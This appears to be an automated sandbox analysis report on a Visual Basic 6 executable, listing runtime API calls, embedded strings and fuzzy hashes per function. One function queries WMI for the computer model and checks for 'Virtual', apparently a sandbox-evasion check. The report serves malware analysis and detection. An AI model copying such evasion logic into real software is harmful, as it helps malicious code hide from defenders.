Instruction Fuzzy Hash: 8DF1D271D00208AFDB11EBA5CC45FDEBBB9BF04304F20456AE505BB2A1EB795A84DF94

Function 005C6123 Relevance: 82.7, APIs: 45, Strings: 2, Instructions: 441COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401526), ref: 005C6141
__vbaNew2.MSVBVM60(0040B6BC,005C9B40,?,?,?,?,00401526), ref: 005C6182
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B6AC,00000014), ref: 005C61CF
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040BE80,00000060), ref: 005C6210
__vbaStrCat.MSVBVM60(?,Info zu ), ref: 005C622C
__vbaStrMove.MSVBVM60(?,Info zu ), ref: 005C6236
__vbaHresultCheckObj.MSVBVM60(00000000,00401458,0040C0A4,00000054), ref: 005C625F
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 005C627D
__vbaFreeObj.MSVBVM60(?,?,00401526), ref: 005C6288
__vbaObjSet.MSVBVM60(?,00000000,?,?,00401526), ref: 005C62A0
__vbaNew2.MSVBVM60(0040B6BC,005C9B40,?,00000000,?,?,00401526), ref: 005C62BE
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B6AC,00000014), ref: 005C630B
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040BE80,000000B8), ref: 005C6352
__vbaNew2.MSVBVM60(0040B6BC,005C9B40), ref: 005C6379
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B6AC,00000014), ref: 005C63C6
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040BE80,000000C0), ref: 005C640D
__vbaNew2.MSVBVM60(0040B6BC,005C9B40), ref: 005C6434
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B6AC,00000014), ref: 005C6481
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040BE80,000000C8), ref: 005C64C8
__vbaStrI2.MSVBVM60(?,Version ), ref: 005C64E4
__vbaStrMove.MSVBVM60(?,Version ), ref: 005C64EE
__vbaStrCat.MSVBVM60(00000000,?,Version ), ref: 005C64F4
__vbaStrMove.MSVBVM60(00000000,?,Version ), ref: 005C64FE
__vbaStrCat.MSVBVM60(0040C274,00000000,00000000,?,Version ), ref: 005C6509
__vbaStrMove.MSVBVM60(0040C274,00000000,00000000,?,Version ), ref: 005C6513
__vbaStrI2.MSVBVM60(?,00000000,0040C274,00000000,00000000,?,Version ), ref: 005C651C
__vbaStrMove.MSVBVM60(?,00000000,0040C274,00000000,00000000,?,Version ), ref: 005C6526
__vbaStrCat.MSVBVM60(00000000,?,00000000,0040C274,00000000,00000000,?,Version ), ref: 005C652C
__vbaStrMove.MSVBVM60(00000000,?,00000000,0040C274,00000000,00000000,?,Version ), ref: 005C6536
__vbaStrCat.MSVBVM60(0040C274,00000000,00000000,?,00000000,0040C274,00000000,00000000,?,Version ), ref: 005C6541
__vbaStrMove.MSVBVM60(0040C274,00000000,00000000,?,00000000,0040C274,00000000,00000000,?,Version ), ref: 005C654B
__vbaStrI2.MSVBVM60(?,00000000,0040C274,00000000,00000000,?,00000000,0040C274,00000000,00000000,?,Version ), ref: 005C6554
__vbaStrMove.MSVBVM60(?,00000000,0040C274,00000000,00000000,?,00000000,0040C274,00000000,00000000,?,Version ), ref: 005C655E
__vbaStrCat.MSVBVM60(00000000,?,00000000,0040C274,00000000,00000000,?,00000000,0040C274,00000000,00000000,?,Version ), ref: 005C6564
__vbaStrMove.MSVBVM60(00000000,?,00000000,0040C274,00000000,00000000,?,00000000,0040C274,00000000,00000000,?,Version ), ref: 005C656E
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040C038,00000054), ref: 005C65A9
__vbaFreeStrList.MSVBVM60(00000008,?,00000000,?,?,?,?,?,?), ref: 005C65DF
__vbaFreeObjList.MSVBVM60(00000004,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 005C65F9
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 005C6614
__vbaNew2.MSVBVM60(0040B6BC,005C9B40,?,00000000), ref: 005C662F
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040B6AC,00000014), ref: 005C667C
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040BE80,00000060), ref: 005C66BD
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040C038,00000054), ref: 005C66F7
__vbaFreeStr.MSVBVM60 ref: 005C670E
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 005C671D

Strings

Info zu , xrefs: 005C6224
Version , xrefs: 005C64DC

Memory Dump Source

Source File: 00000000.00000002.1705699879.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1705650867.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705664501.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705685835.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705957733.00000000005C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705957733.00000000005CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VYLigyTDuW.jbxd

Similarity

API ID: __vba$CheckHresult$Move$Free$New2$List$Chkstk
String ID: Info zu $Version
API String ID: 2866532796-1133326459
Opcode ID: a55e6215144b06f3398678e699e831a07d42c107491f5a9e53bbe1f101202dd9
Instruction ID: 65e762f10ee72ad1abc78a5d33e0b93658809245fd7762c172c9f7501d95223a
Opcode Fuzzy Hash: a55e6215144b06f3398678e699e831a07d42c107491f5a9e53bbe1f101202dd9
Instruction Fuzzy Hash: DF12B071900218EFDB11EFE4C889F9DBBB9FB08304F1045AAE505BB2A1DB755A88DF54

Function 005C6ABD Relevance: 69.3, APIs: 46, Instructions: 301COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401526), ref: 005C6ADB
__vbaStrToAnsi.MSVBVM60(?,00401526,00000000,0002003F,?,?,?,?,?,00401526), ref: 005C6B13
__vbaSetSystemError.MSVBVM60(?,00000000,?,00401526,00000000,0002003F,?,?,?,?,?,00401526), ref: 005C6B29
__vbaStrToUnicode.MSVBVM60(00401526,00000000,?,00000000,?,00401526,00000000,0002003F,?,?,?,?,?,00401526), ref: 005C6B34
__vbaFreeStr.MSVBVM60(00401526,00000000,?,00000000,?,00401526,00000000,0002003F,?,?,?,?,?,00401526), ref: 005C6B45
#606.MSVBVM60(00000400,00000002), ref: 005C6B69
__vbaStrMove.MSVBVM60(00000400,00000002), ref: 005C6B73
__vbaFreeVar.MSVBVM60(00000400,00000002), ref: 005C6B7B
__vbaStrToAnsi.MSVBVM60(?,00401526,00000400,00000400,00000002), ref: 005C6B92
__vbaStrToAnsi.MSVBVM60(00000000,?,00000000,?,00000000,?,00401526,00000400,00000400,00000002), ref: 005C6BA7
__vbaSetSystemError.MSVBVM60(?,00000000,00000000,?,00000000,?,00000000,?,00401526,00000400,00000400,00000002), ref: 005C6BBB
__vbaStrToUnicode.MSVBVM60(?,00000000,?,00000000,00000000,?,00000000,?,00000000,?,00401526,00000400,00000400,00000002), ref: 005C6BC6
__vbaStrToUnicode.MSVBVM60(00401526,?,?,00000000,?,00000000,00000000,?,00000000,?,00000000,?,00401526,00000400,00000400,00000002), ref: 005C6BD2
__vbaFreeStrList.MSVBVM60(00000002,00000000,?,00401526,?,?,00000000,?,00000000,00000000,?,00000000,?,00000000,?,00401526), ref: 005C6BEA
__vbaStrCopy.MSVBVM60(00401526,00000000,?,00000000,?,00401526,00000000,0002003F,?), ref: 005C6EC3
__vbaSetSystemError.MSVBVM60(?), ref: 005C6EDB
__vbaFreeStr.MSVBVM60(005C6F2D,?), ref: 005C6F27

Memory Dump Source

Source File: 00000000.00000002.1705699879.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1705650867.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705664501.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705685835.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705957733.00000000005C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705957733.00000000005CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VYLigyTDuW.jbxd

Similarity

API ID: __vba$Free$AnsiErrorSystemUnicode$#606ChkstkCopyListMove
String ID:
API String ID: 3225542645-0
Opcode ID: a3941584acae2e6668564921ef6d8b9569edf7b7fe5e00e115fc65a62e0eefff
Instruction ID: 99b08a2eb679d0c45a64f2dba89f1998bb4c365995d42df44c2d087ccb88bdf1
Opcode Fuzzy Hash: a3941584acae2e6668564921ef6d8b9569edf7b7fe5e00e115fc65a62e0eefff
Instruction Fuzzy Hash: E2C1A1B1D00219ABDB11EFE5C885FDEBBB8BF04304F00856AF515B71A1DB399A458F64

Function 005C6798 Relevance: 52.7, APIs: 24, Strings: 6, Instructions: 196COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401526), ref: 005C67B6
__vbaOnError.MSVBVM60(00000001,?,?,?,?,00401526), ref: 005C67E3
__vbaStrCopy.MSVBVM60(00000001,?,?,?,?,00401526), ref: 005C67F0
__vbaStrCopy.MSVBVM60(00000001,?,?,?,?,00401526), ref: 005C67FD
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040C0D4,000006FC), ref: 005C6856
__vbaFreeStrList.MSVBVM60(00000002,?,00000001), ref: 005C6882
__vbaStrCopy.MSVBVM60(?,?,00401526), ref: 005C68A2
__vbaStrCopy.MSVBVM60(?,?,00401526), ref: 005C68AF
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040C0D4,000006FC), ref: 005C6908
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 005C6934
__vbaStrCat.MSVBVM60(\MSINFO32.EXE,?,?,?,?,?,?,00401526), ref: 005C694F
#645.MSVBVM60(00000008,00000000), ref: 005C6964
__vbaStrMove.MSVBVM60(00000008,00000000), ref: 005C696E
__vbaStrCmp.MSVBVM60(0040AC10,00000000,00000008,00000000), ref: 005C6979
__vbaFreeStr.MSVBVM60(0040AC10,00000000,00000008,00000000), ref: 005C6990
__vbaFreeVar.MSVBVM60(0040AC10,00000000,00000008,00000000), ref: 005C6998
__vbaStrCat.MSVBVM60(\MSINFO32.EXE,?,0040AC10,00000000,00000008,00000000), ref: 005C69B0
__vbaStrMove.MSVBVM60(\MSINFO32.EXE,?,0040AC10,00000000,00000008,00000000), ref: 005C69BA
#600.MSVBVM60(00004008,00000001,?,?,?,?,?,?,?,?,?,?,\MSINFO32.EXE,?,0040AC10,00000000), ref: 005C69DA
__vbaVarDup.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,0040AC10,00000000,00000008,00000000), ref: 005C6A25
#595.MSVBVM60(?,00000000,0000000A,0000000A,0000000A), ref: 005C6A3C
__vbaFreeVarList.MSVBVM60(00000004,?,0000000A,0000000A,0000000A,?,00000000,0000000A,0000000A,0000000A), ref: 005C6A53
__vbaExitProc.MSVBVM60(?,?,?,?,?,?,?,?,?,?,00401526), ref: 005C6A5B
__vbaFreeStr.MSVBVM60(005C6A9E,?,?,?,?,?,?,?,?,?,?,00401526), ref: 005C6A98

Strings

SOFTWARE\Microsoft\Shared Tools\MSINFO, xrefs: 005C67F5
PATH, xrefs: 005C67E8
Systeminformation are not available!, xrefs: 005C6A11
MSINFO, xrefs: 005C689A
\MSINFO32.EXE, xrefs: 005C694A, 005C69AB
SOFTWARE\Microsoft\Shared Tools Location, xrefs: 005C68A7

Memory Dump Source

Source File: 00000000.00000002.1705699879.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1705650867.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705664501.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705685835.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705957733.00000000005C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705957733.00000000005CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VYLigyTDuW.jbxd

Similarity

API ID: __vba$Free$Copy$List$CheckHresultMove$#595#600#645ChkstkErrorExitProc
String ID: MSINFO$PATH$SOFTWARE\Microsoft\Shared Tools Location$SOFTWARE\Microsoft\Shared Tools\MSINFO$Systeminformation are not available!$\MSINFO32.EXE
API String ID: 2627723877-2418805842
Opcode ID: fd0153f60f77bf9ab3c850f65730bdcf1eb54a12ba80c03e667e45d87d5b2618
Instruction ID: e0d43b2c2445254daf4f9b22513640172d773f6a7b4b4c150fb39420676b4479
Opcode Fuzzy Hash: fd0153f60f77bf9ab3c850f65730bdcf1eb54a12ba80c03e667e45d87d5b2618
Instruction Fuzzy Hash: F381F8B1900208EADB10DFD1CC85FDEBBB8BF08704F1085AAE505B7191DB799A45CF65

Function 0054E474 Relevance: 45.7, APIs: 21, Strings: 5, Instructions: 152COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401526), ref: 0054E491
__vbaVarDup.MSVBVM60 ref: 0054E4C5
#626.MSVBVM60(?,?,0000000A), ref: 0054E4D6
__vbaVarZero.MSVBVM60(?,?,0000000A), ref: 0054E4E4
__vbaFreeVarList.MSVBVM60(00000002,?,0000000A,?,?,0000000A), ref: 0054E4FF
__vbaChkstk.MSVBVM60 ref: 0054E518
__vbaVarLateMemCallLd.MSVBVM60(?,?,ExecQuery,00000001), ref: 0054E537
__vbaVarZero.MSVBVM60 ref: 0054E547
__vbaForEachVar.MSVBVM60(?,?,?,?,?,?), ref: 0054E573
__vbaVarLateMemCallLd.MSVBVM60(?,?,Model,00000000), ref: 0054E58F
__vbaVarMove.MSVBVM60(?,?,?,?), ref: 0054E59C
__vbaNextEachVar.MSVBVM60(?,?,?,?,?,?,?,?,?), ref: 0054E5C1
__vbaVarDup.MSVBVM60 ref: 0054E5EF
#633.MSVBVM60(?,00000002,?,?,00000001), ref: 0054E614
#635.MSVBVM60(?,?,00000002,?,?,00000001), ref: 0054E61D
__vbaFreeVarList.MSVBVM60(00000003,00000002,?,?,?,?,00000002,?,?,00000001), ref: 0054E634
__vbaAryUnlock.MSVBVM60(?,0054E6A1), ref: 0054E668
__vbaFreeObj.MSVBVM60(?,0054E6A1), ref: 0054E673
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,0054E6A1), ref: 0054E688
__vbaFreeVar.MSVBVM60(?,?,?,?,?), ref: 0054E693
__vbaFreeVar.MSVBVM60(?,?,?,?,?), ref: 0054E69B

Strings

Select * from Win32_ComputerSystem, xrefs: 0054E507
Model, xrefs: 0054E582
ExecQuery, xrefs: 0054E528
Virtual, xrefs: 0054E5D5
winmgmts:\\.\roo, xrefs: 0054E4B1

Memory Dump Source

Source File: 00000000.00000002.1705699879.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1705650867.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705664501.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705685835.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705957733.00000000005C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705957733.00000000005CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VYLigyTDuW.jbxd

Similarity

API ID: __vba$Free$List$CallChkstkEachLateZero$#626#633#635MoveNextUnlock
String ID: ExecQuery$Model$Select * from Win32_ComputerSystem$Virtual$winmgmts:\\.\roo
API String ID: 317657414-3508441954
Opcode ID: ab30cbbea380c31f75489986784e7d93bff89fe5db6f679705c38951ddc44263
Instruction ID: 018c7f4f6ec0c4baca270a973e85720515c886150e909b25a3c45fef7603af7a
Opcode Fuzzy Hash: ab30cbbea380c31f75489986784e7d93bff89fe5db6f679705c38951ddc44263
Instruction Fuzzy Hash: 5451D5B280021CAADB11DBD1CD46FDEB7BCAB04304F1045AAE109B7191EB796B498FA5

Function 005C2F10 Relevance: 37.6, APIs: 25, Instructions: 130COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401526), ref: 005C2F2C
__vbaStrCat.MSVBVM60(0040B46C,0040B45C,?,?,?,?,00401526), ref: 005C2F60
__vbaStrMove.MSVBVM60(0040B46C,0040B45C,?,?,?,?,00401526), ref: 005C2F6A
__vbaStrCat.MSVBVM60(0040B1F0,00000000,0040B46C,0040B45C,?,?,?,?,00401526), ref: 005C2F75
__vbaStrMove.MSVBVM60(0040B1F0,00000000,0040B46C,0040B45C,?,?,?,?,00401526), ref: 005C2F7F
__vbaStrCat.MSVBVM60(0040B380,00000000,0040B1F0,00000000,0040B46C,0040B45C,?,?,?,?,00401526), ref: 005C2F8A
__vbaStrMove.MSVBVM60(0040B380,00000000,0040B1F0,00000000,0040B46C,0040B45C,?,?,?,?,00401526), ref: 005C2F94
__vbaStrCat.MSVBVM60(0040B25C,00000000,0040B380,00000000,0040B1F0,00000000,0040B46C,0040B45C,?,?,?,?,00401526), ref: 005C2F9F
__vbaStrMove.MSVBVM60(0040B25C,00000000,0040B380,00000000,0040B1F0,00000000,0040B46C,0040B45C,?,?,?,?,00401526), ref: 005C2FA9
__vbaStrCat.MSVBVM60(0040B8CC,00000000,0040B25C,00000000,0040B380,00000000,0040B1F0,00000000,0040B46C,0040B45C,?,?,?,?,00401526), ref: 005C2FB4
__vbaStrMove.MSVBVM60(0040B8CC,00000000,0040B25C,00000000,0040B380,00000000,0040B1F0,00000000,0040B46C,0040B45C,?,?,?,?,00401526), ref: 005C2FBE
__vbaStrCat.MSVBVM60(0040B8F8,00000000,0040B8CC,00000000,0040B25C,00000000,0040B380,00000000,0040B1F0,00000000,0040B46C,0040B45C), ref: 005C2FC9
__vbaStrMove.MSVBVM60(0040B8F8,00000000,0040B8CC,00000000,0040B25C,00000000,0040B380,00000000,0040B1F0,00000000,0040B46C,0040B45C), ref: 005C2FD3
__vbaStrCat.MSVBVM60(0040B914,00000000,0040B8F8,00000000,0040B8CC,00000000,0040B25C,00000000,0040B380,00000000,0040B1F0,00000000,0040B46C,0040B45C), ref: 005C2FDE
__vbaStrMove.MSVBVM60(0040B914,00000000,0040B8F8,00000000,0040B8CC,00000000,0040B25C,00000000,0040B380,00000000,0040B1F0,00000000,0040B46C,0040B45C), ref: 005C2FE8
__vbaStrCat.MSVBVM60(0040B940,00000000,0040B914,00000000,0040B8F8,00000000,0040B8CC,00000000,0040B25C,00000000,0040B380,00000000,0040B1F0,00000000,0040B46C,0040B45C), ref: 005C2FF3
__vbaStrMove.MSVBVM60(0040B940,00000000,0040B914,00000000,0040B8F8,00000000,0040B8CC,00000000,0040B25C,00000000,0040B380,00000000,0040B1F0,00000000,0040B46C,0040B45C), ref: 005C2FFD
__vbaStrCat.MSVBVM60(0040B964,00000000,0040B940,00000000,0040B914,00000000,0040B8F8,00000000,0040B8CC,00000000,0040B25C,00000000,0040B380,00000000,0040B1F0,00000000), ref: 005C3008
__vbaStrMove.MSVBVM60(0040B964,00000000,0040B940,00000000,0040B914,00000000,0040B8F8,00000000,0040B8CC,00000000,0040B25C,00000000,0040B380,00000000,0040B1F0,00000000), ref: 005C3012
__vbaStrCat.MSVBVM60(0040B97C,00000000,0040B964,00000000,0040B940,00000000,0040B914,00000000,0040B8F8,00000000,0040B8CC,00000000,0040B25C,00000000,0040B380,00000000), ref: 005C301D
__vbaChkstk.MSVBVM60(0040B97C,00000000,0040B964,00000000,0040B940,00000000,0040B914,00000000,0040B8F8), ref: 005C302F

Part of subcall function 0054F663: __vbaChkstk.MSVBVM60(?,00401526), ref: 0054F67F
Part of subcall function 0054F663: __vbaVarDup.MSVBVM60(?,00000008,?,?,00401526), ref: 0054F697
Part of subcall function 0054F663: #653.MSVBVM60(?,?,?,00000008,?,?,00401526), ref: 0054F6A4
Part of subcall function 0054F663: __vbaI4Var.MSVBVM60(?,?,?,?,00000008,?,?,00401526), ref: 0054F6AD
Part of subcall function 0054F663: __vbaFreeVar.MSVBVM60 ref: 0054F6C6
Part of subcall function 0054F663: #632.MSVBVM60(?,?,00000001,00000002), ref: 0054F6FB
Part of subcall function 0054F663: __vbaVarCat.MSVBVM60(?,?,?,?,?,00000001,00000002), ref: 0054F70C
Part of subcall function 0054F663: __vbaVarMove.MSVBVM60(?,?,?,?,?,00000001,00000002), ref: 0054F716
Part of subcall function 0054F663: __vbaFreeVarList.MSVBVM60(00000002,00000002,?,?,?,?,?,?,00000001,00000002), ref: 0054F725
Part of subcall function 0054F663: __vbaFreeVar.MSVBVM60(0054F768), ref: 0054F762

__vbaStrVarMove.MSVBVM60(00000000,00000000,0040B97C,00000000,0040B964,00000000,0040B940,00000000,0040B914,00000000,0040B8F8), ref: 005C304A
__vbaStrMove.MSVBVM60(00000000,00000000,0040B97C,00000000,0040B964,00000000,0040B940,00000000,0040B914,00000000,0040B8F8), ref: 005C3054
__vbaFreeStrList.MSVBVM60(00000009,?,?,0040B45C,0040B46C,00000000,0040B1F0,00000000,0040B380,00000000,00000000,00000000,0040B97C,00000000,0040B964,00000000), ref: 005C307F
__vbaFreeVarList.MSVBVM60(00000002,?,?,00000000,0040B1F0,00000000,0040B46C,0040B45C,?,?,?,?,00401526), ref: 005C3091

Memory Dump Source

Source File: 00000000.00000002.1705699879.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1705650867.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705664501.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705685835.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705957733.00000000005C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705957733.00000000005CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VYLigyTDuW.jbxd

Similarity

API ID: __vba$Move$Free$ChkstkList$#632#653
String ID:
API String ID: 4029463932-0
Opcode ID: 422ba0568d9e2c969a6cd2cc6caea86c5b0873fd1c7b089b4d8dd28dccff5d4c
Instruction ID: ff5e5ae46b63ad23feb8941baf45882c2eadd373bc84d82db604c6a8dabb13fe
Opcode Fuzzy Hash: 422ba0568d9e2c969a6cd2cc6caea86c5b0873fd1c7b089b4d8dd28dccff5d4c
Instruction Fuzzy Hash: 4B41BE72A40108AAD701EBE5CD42EEE77BDEF45704F50813BB501B71E2EE785A058BA9

Function 005C7005 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 159COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401526), ref: 005C7023
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,00401526), ref: 005C7064
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040C3AC,000000A0), ref: 005C70AE
__vbaStrCmp.MSVBVM60(password,?), ref: 005C70CA
__vbaFreeStr.MSVBVM60(password,?), ref: 005C70E0
__vbaFreeObj.MSVBVM60(password,?), ref: 005C70E8
__vbaHresultCheckObj.MSVBVM60(00000000,004014A8,0040C314,000002B4), ref: 005C7132
__vbaVarDup.MSVBVM60(password,?), ref: 005C717B
__vbaVarDup.MSVBVM60(password,?), ref: 005C7194
#595.MSVBVM60(?,00000000,?,0000000A,0000000A,password,?), ref: 005C71AB
__vbaFreeVarList.MSVBVM60(00000004,?,?,0000000A,0000000A,?,00000000,?,0000000A,0000000A,password,?), ref: 005C71C2
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,00401526), ref: 005C71DD
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040C3AC,00000204), ref: 005C7223
__vbaFreeObj.MSVBVM60(00000000,?,0040C3AC,00000204), ref: 005C723A
#599.MSVBVM60({Home}+{End},0000000A), ref: 005C7256
__vbaFreeVar.MSVBVM60({Home}+{End},0000000A), ref: 005C725E

Strings

{Home}+{End}, xrefs: 005C7251
password, xrefs: 005C70C5

Memory Dump Source

Source File: 00000000.00000002.1705699879.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1705650867.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705664501.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705685835.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705957733.00000000005C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705957733.00000000005CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VYLigyTDuW.jbxd

Similarity

API ID: __vba$Free$CheckHresult$#595#599ChkstkList
String ID: password${Home}+{End}
API String ID: 938176104-3822402063
Opcode ID: 6dc114b7e537e65a309cbc68b0f04ef21c676b2e242459aa33252d97b29926c0
Instruction ID: 8d720e83682883a44ce5818f6a81964ba0f228d75f05e74c23213e588ded1da4
Opcode Fuzzy Hash: 6dc114b7e537e65a309cbc68b0f04ef21c676b2e242459aa33252d97b29926c0
Instruction Fuzzy Hash: 7361D471A0021CAFCB10EF94C885BDDBBB8FF09304F5085AAE549BB1A1D7789A85CF55

Function 0054C72B Relevance: 30.1, APIs: 20, Instructions: 105COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401526), ref: 0054C746

Part of subcall function 0054C6B3: __vbaChkstk.MSVBVM60(?,00401526), ref: 0054C6CE
Part of subcall function 0054C6B3: __vbaRedim.MSVBVM60(00000080,00000001,005C9210,00000011,00000001,0000003F,00000000,?,?,?,?,00401526), ref: 0054C6F4

__vbaFreeVar.MSVBVM60(?,?,?,?,?,00401526), ref: 0054C764
#644.MSVBVM60(00000000,?,?,?,?,?,00401526), ref: 0054C76B
__vbaSetSystemError.MSVBVM60(00000000,00000000,?,?,?,?,?,00401526), ref: 0054C779
__vbaStrCat.MSVBVM60(0040AF80,0040AF78,?,00000000,00000000,?,?,?,?,?,00401526), ref: 0054C792
__vbaStrMove.MSVBVM60(0040AF80,0040AF78,?,00000000,00000000,?,?,?,?,?,00401526), ref: 0054C79C
__vbaStrCat.MSVBVM60(0040AF70,00000000,0040AF80,0040AF78,?,00000000,00000000,?,?,?,?,?,00401526), ref: 0054C7A7
__vbaStrMove.MSVBVM60(0040AF70,00000000,0040AF80,0040AF78,?,00000000,00000000,?,?,?,?,?,00401526), ref: 0054C7B1
__vbaStrCat.MSVBVM60(0040AF88,00000000,0040AF70,00000000,0040AF80,0040AF78,?,00000000,00000000,?,?,?,?,?,00401526), ref: 0054C7BC
__vbaStrMove.MSVBVM60(0040AF88,00000000,0040AF70,00000000,0040AF80,0040AF78,?,00000000,00000000,?,?,?,?,?,00401526), ref: 0054C7C6
__vbaI4Str.MSVBVM60(00000000,0040AF88,00000000,0040AF70,00000000,0040AF80,0040AF78,?,00000000,00000000,?,?,?,?,?,00401526), ref: 0054C7CC
__vbaStrCat.MSVBVM60(0040AF70,0040AF68,00000000,00000000,0040AF88,00000000,0040AF70,00000000,0040AF80,0040AF78,?,00000000,00000000,?), ref: 0054C7DC
__vbaStrMove.MSVBVM60(0040AF70,0040AF68,00000000,00000000,0040AF88,00000000,0040AF70,00000000,0040AF80,0040AF78,?,00000000,00000000,?), ref: 0054C7E6
__vbaI4Str.MSVBVM60(00000000,0040AF70,0040AF68,00000000,00000000,0040AF88,00000000,0040AF70,00000000,0040AF80,0040AF78,?,00000000,00000000,?), ref: 0054C7EC
__vbaSetSystemError.MSVBVM60(?,00000000,00000000,0040AF70,0040AF68,00000000,00000000,0040AF88,00000000,0040AF70,00000000,0040AF80,0040AF78,?,00000000,00000000), ref: 0054C7FA
__vbaFreeStrList.MSVBVM60(00000004,?,?,?,?,?,00000000,00000000,0040AF70,0040AF68,00000000,00000000,0040AF88,00000000,0040AF70,00000000), ref: 0054C811
__vbaAryLock.MSVBVM60(?), ref: 0054C823
#644.MSVBVM60(?,?), ref: 0054C839
__vbaAryUnlock.MSVBVM60(?,?,?), ref: 0054C845
__vbaSetSystemError.MSVBVM60(?,00000040,?,?,?,?,00000040,?,?,?), ref: 0054C868

Memory Dump Source

Source File: 00000000.00000002.1705699879.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

